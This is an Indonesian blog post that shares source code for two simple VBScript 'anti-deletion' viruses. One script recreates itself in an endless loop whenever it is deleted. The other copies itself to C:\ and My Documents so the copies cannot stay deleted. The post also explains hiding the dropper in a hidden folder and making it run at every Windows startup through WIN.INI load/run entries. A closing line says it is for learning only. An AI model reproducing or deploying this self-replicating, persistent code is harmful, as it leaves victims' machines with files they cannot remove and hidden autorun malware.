Source [K]alamar

Bingung mo nulis apa lagi, tapi tenang belum kehabisan bahan tulisan. kali ini mo nyoba nulis scrip, bisa dibilang contoh virus micro “anti deletion Virusnya [K]alamar” nih dia sourcenya [K]alamar ini :


dim fso, axl,rose,idiot
Set Rose = CreateObject("WScript.Shell")
set fso = createobject("scripting.filesystemobject")
set Axl = fso.opentextfile(wscript.scriptfullname,1)
idiot = Axl.readall
Axl.close
do
if fso.fileexists(wscript.scriptfullname) = false then
set Axl = fso.createtextfile(wscript.scriptfullname)
Axl.write idiot
Axl.close
end if
loop

simpan script diatas dengan nama "readme" misalnya "readme.vbs" atau terserah lo dah mo ngasih nama apa, lalu jalankan! sekarang coba lo hapus Rizal.vbs hehehe pasti ga bisakan, soalnya nih Virus bakal baca dirinya sendiri lalu mengecek apakah ada Virus ini, jika ga ada (dalam hal ini waktu kamu hapus) maka akan diciptakan lagi. Sekarang lihat juga script yang gw dapet :

Dim fso,File
SR = ".\RS.vbs"
do
set fso = createobject("scripting.filesystemobject")
set File=fso.GetFile(SR)
File.Copy "C:\my documents\antis.vbs"
File.Copy "c:\antis.vbs"
loop

tulis script diatas dan simpan dengan nama "RS.vbs" lalu jalankan, dia akan mengcopykan diri sendiri di my documents dan di drive C:/ dengan nama antis.vbs, nah sekarang coba delete antis.vbs yang ada di drive C ato di My documents, memang awalnya bisa dihapus tapi dia akan menciptakan lagi. Woi kok gak sesuai judulnya, katanya semua file dapat jadi ANTIDELETION, memang bisa caranya, ubah parameter SR dengan file yang lo suka misal nih >> SR=".\AKU.txt" trus nama file di drivenya juga dapat di ganti sesuka kamu kok, contoh file.copy "C:\KAMU.txt" maka dijamin KAMU.txt ketika selesai tercopy gak akan bisa terhapus. Kelemahannya RS.vbs (script pengantarnya) ga boleh terhapus dan harus tereksekusi, untuk mengatasi ini lo dapat menyembunyikan RS.vbs di folder yang Hidden dan agar tereksekusi otomatis kamu bisa gunakan manipulasi WIN.INI agar me-RUN RS.vbs otomatis saat windows starting.

[windows]
load=c:\hidden_folder\RS.vbs
run=c:\hidden_folder\RS.vbs

hehehehe ... selamat mencoba

#Warning >> Scrip ini hanya untuk pembelajaran saja, tidak untuk disalah gunakan

0 komentar:

Copyright © 2012 komputer-tech
Design by stuff-freeiz